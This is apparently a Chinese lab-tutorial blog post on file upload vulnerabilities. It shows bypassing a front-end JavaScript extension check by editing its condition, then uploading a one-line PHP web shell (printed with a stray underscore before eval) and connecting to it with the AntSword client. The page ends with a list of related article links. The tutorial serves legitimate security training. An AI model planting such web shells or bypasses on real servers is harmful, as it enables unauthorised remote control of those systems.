文件上传的小点总结

1.文件上传漏洞

服务器端脚本语言对上传文件没有严格的验证和过滤,就可以给攻击者上传恶意脚本文件的可能。

文件上传检测绕过:

简单思路:(这里以前端上传图片为例)

①开启phpstudy,启动apache即可,将目录设为靶场网站下www的目录。

②获取靶场源码,可以先保存到本地。

③使用notepad++修改文件上传过滤的JS文件,使其条件判断允许非正常文件后缀通过,并且在form表单中加入action属性,处理前端页面。

下面就是一个文件类型判断的代码,将判断条件可以直接改为1==-1就可以让文件允许上传。

复制代码
//判断上传文件类型是否允许上传
    if (allow_ext.indexOf(ext_name + "|") == -1) {
        var errMsg = "该文件不允许上传,请上传" + allow_ext + "类型的文件,当前文件类型为:" + ext_name;alert(errMsg);
        return false;
    }

重新打开本地保存好的靶场首页文件,选择任意php文件上传后,复制图片地址进行访问。(使用了一个info.php文件)

如果要上传一句话木马,那么直接写文件

复制代码
<?php @_eval($_POST['hack']); ?>

将文件名改为111.php,直接上传文件,上传成功后,复制图片地址。使用蚁剑,将刚才的地址和连接密码(也就是POST参数)连接并添加。

上传成功,刚才的两个文件这里都可以看到。

相关推荐
white_ant37 分钟前
安全认证与 API 网关
安全
xixixi7777711 小时前
三大 AI 安全里程碑:Akamai 高危风险预警、智能体水印强制落地、PQC 量子安全全产业链统一
大数据·人工智能·安全·ai·大模型·智能体·政策
hz5678913 小时前
电子远程评标系统哪家好?安全、合规、易用平台评测指南
安全·云计算·音视频·实时音视频·信息与通信
MartinYeung513 小时前
[论文学习]大语言模型安全综述:攻击、防御、对齐、度量与护栏的深度解析
学习·安全·语言模型
卓豪终端管理16 小时前
企业数据防泄漏:现代设备控制如何成为终端安全的关键防线
安全
技术不好的崎鸣同学18 小时前
[GXYCTF2019]Ping Ping Ping 思路及解法
网络·安全·web安全
GEO_youxuan21 小时前
2026年儿童电话手表推荐:定位精度、通话安全与健康监测深度横评
安全
数据知道21 小时前
安全报告怎么写才专业:渗透测试报告模板与踩坑
安全·网络安全·漏洞修复·安全报告·渗透测试报告
doiito1 天前
【安全,架构】RustyVault 项目深度分析报告以及和HashiCorp Vault的差异
后端·安全·rust
2601_962851741 天前
计算机毕业设计之基于SSM的网络安全课程资源分享平台
vue.js·算法·安全·web安全·yolo·目标检测·课程设计